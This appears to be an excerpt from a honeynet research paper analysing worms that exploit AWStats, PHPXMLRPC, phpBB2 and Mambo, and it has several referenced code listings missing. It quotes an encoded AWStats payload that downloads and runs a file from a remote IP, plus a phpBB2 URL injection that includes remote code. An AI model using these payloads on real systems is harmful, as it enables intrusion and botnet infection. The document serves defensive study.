(Please note that the IP addresses and domains have been obfuscated throughout this paper.)

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '192.168.1.216/nikons' to be downloaded and stored in the /tmp directory. Then it would be made executable using the 'chmod +x nikons' and finally it would be executed.

This file 'nikons' was a shell script which attempted to download two programs; an IRC bot, identified as Tsunami.A and a variant of the Lupper worm. The Lupper variant tried to spread via scanning for hosts listening on port 80 and attempting to exploit the AWStats and PHPXMLRPC vulnerabilities. (Another Lupper variant is described as trying to exploit a file called hints.pl - this behavior not present in our captured version.)

The bash script 'nikons', which downloads and executes two files from a webserver.

The worm probed for the following scripts: /xmlrpc/xmlrpc.php, /wordpress/xmlrpc.php, /phpgroupware/xmlrpc.php, /drupal/xmlrpc.php,
/blogs/xmlsrv/xmlrpc.php, /blog/xmlsrv/xmlrpc.php, /blog/xmlrpc.php
If present, any of these scripts would have been exploited via the following PHPXMLRPC exploit. The following POST payload downloads the tool "gicuji", a shell script to download and execute the Lupper and Tsunami binaries.

The PHPBB Worm

This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&

The worm checks if the PHPBB installation is vulnerable by fetching the following URL, by attempting to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project have analysed an incident in which this script 'cmd.txt' appears: "Defacing Tool 2.0 by r3v3ng4ns" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to
deface web sites.". In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands, searching for files. This will only be an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.